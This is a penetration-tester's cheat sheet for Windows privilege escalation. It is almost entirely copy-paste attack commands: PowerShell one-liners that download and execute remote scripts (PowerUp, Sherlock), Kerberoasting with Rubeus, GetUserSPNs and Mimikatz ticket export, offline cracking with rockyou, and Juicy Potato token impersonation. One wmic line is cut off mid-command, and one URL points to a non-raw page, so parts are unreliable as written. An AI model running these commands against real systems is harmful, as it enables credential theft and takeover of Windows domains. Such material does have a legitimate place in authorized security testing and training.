02 Privilege Escalation
Basic
Kerberoast
Juicy Potato
Impersonating
# Rubeus
# PowerShellMafia
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
powershell.exe -c "Import-Module C:\Users\Public\PowerUp.ps1; Invoke-AllChecks"
powershell.exe -c "Import-Module C:\Users\Public\Get-System.ps1; Get-System"
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1'); Invoke-AllChecks -Command 'start powershell.exe'"
# Sherlock
https://github.com/rasta-mouse/Sherlock
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1'); Find-AllVulns -Command 'start powershell.exe'"
# Unquoted service paths
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v
.\.rubeus.exe kerberoast /creduser:ecorp\morph3 /credpassword:pass1234
# List available SPNs (Kerberoastable service accounts)
setspn.exe -t evil.corp -q */*
powershell.exe -exec bypass -c "Import-Module .\GetUserSPNs.ps1"
cscript.exe GetUserSPNs.ps1
# List cached tickets
Invoke-Mimikatz -Command '"kerberos::list"'
powershell.exe -c "klist"
powershell.exe -c "Import-Module C:\Users\Public\Invoke-Mimikatz.ps1; Invoke-Mimikatz -Command '"kerberos::list"'"
# Request tickets
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/web01.medin.local"
# Request tickets remotely
python GetUserSPNs.py -request ECORP/morph3:[email protected]
# Extract tickets
powershell.exe -c "Import-Module C:\Users\Public\Invoke-Kerberoast.ps1; Invoke-Kerberoast -OutputFormat Hashcat"
Invoke-Mimikatz -Command '"kerberos::list /export"'
# Crack Tickets
python tgsrepcrack.py /usr/share/wordlists/rockyou.txt ticket.kirbi
https://github.com/ohpe/juicy-potato/releases # Pick a CLSID from the list below that matches your Windows version
https://github.com/ohpe/juicy-potato/tree/master/CLSID
Required privileges: SeAssignPrimaryTokenPrivilege or SeImpersonatePrivilege
C:\Windows\Temp\JuicyPotato.exe -p cmd.exe -a "/c whoami > C:\Users\Public\morph3.txt" -t * -l 1031 -c {d20a3293-3341-4ae8-9aaf-8e397cb63c34}